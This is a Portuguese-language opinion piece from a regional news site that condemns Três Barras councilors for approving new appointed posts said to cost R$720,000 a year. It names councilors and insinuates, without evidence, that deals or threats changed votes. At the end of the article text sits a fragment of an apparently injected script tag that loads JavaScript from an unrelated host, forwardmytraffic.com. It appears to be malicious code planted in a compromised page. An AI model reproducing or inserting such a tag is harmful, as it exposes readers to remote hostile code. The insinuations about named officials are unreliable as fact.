InícioDestaqueVereadores de Três Barras, Vocês Estão Cegos, Surdos e Mudos?

Vereadores de Três Barras, Vocês Estão Cegos, Surdos e Mudos?

Últimas notícias

GAECO e GEAC deflagram 5ª fase da Operação Mensageiro; deputado é visitado

Na manhã desta segunda-feira (29-4), o Grupo de Atuação...

Acidente na BR-116 resulta em cinco mortes

Na noite deste domingo (28), equipes do Corpo de...

Colisão na BR-280 em Três Barras, mata mulher e deixa seis feridos

Na noite deste domingo, 28, os bombeiros de Três...

VERGONHA! OU MELHOR, SEM VERGONHA!

Você não viram a população que lotou a casa de leis duas vezes? Vocês não ouviram os seus anseios para que a prefeitura tresbarrense não fosse loteada? Vocês não perceberam que o maior interessado, o povo, era contra? Agora, esperamos que quebrem o silêncio e nos expliquem o porquê. Por que votaram contra o povo? Por favor nos falem, sem enrolação, que motivos os levaram a trair aqueles que os elegeram?

 

 

Serão mais 720 mil por ano!

 

 

Sim, 720 mil reais por ano é a previsão de custo dos novos cargos aprovado na Câmara de Vereadores de Três Barras.

 

 

Parece que a tática utilizada pelo vereador Laudecir deu resultado, pois até mesmo um dos maiores críticos do projeto, o edil Bano Mendes mudou de opinião e votou a favor da criação dessa obscenidade. Queria eu saber o motivo que o levou a tal decisão, que negociações realizou? Ameaças, será?

 

 

Foram apenas dois votos contrários, Marco Antônio (Gorguinho) e Dani Krailing (esse texto não é para eles), e teve também duas ausências, Ernani Jr e Edenilson. Lembrando sempre, quem cala consente.

 

 

Um áudio vazou durante a tarde de segunda, onde supostamente o diretor da SAMASA afirmava não haver necessidade de se criar a vaga na autarquia que o mesmo dirige e, que tal ato era simplesmente para atender obrigações políticas. O próprio Vereador Bano já havia feito tal afirmação antes.

 

 

Outro fato estranho que ocorreu, foi uma reunião dos funcionários comissionados na Câmara, algo que não é corriqueiro da administração e que impossibilitou que o público que foi acompanhar a seção pudesse entrar para fazer pressão, pois o recinto já estava lotado.

 

 

Cabe salientar, o prefeito, em momento algum, buscou explicar a real necessidade de se aprovar a criação desses cargos, sua ação foi de ditador, no melhor estilo do coronelismo, mandou aqueles que dependem do emprego para impor sua vontade.

 

 

Que vergonha prefeito, foi para isso que o senhor foi eleito?

 

 

A conclusão que podemos tirar de tudo o que aconteceu é que vão usar o dinheiro do público para consumar suas alianças políticas…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.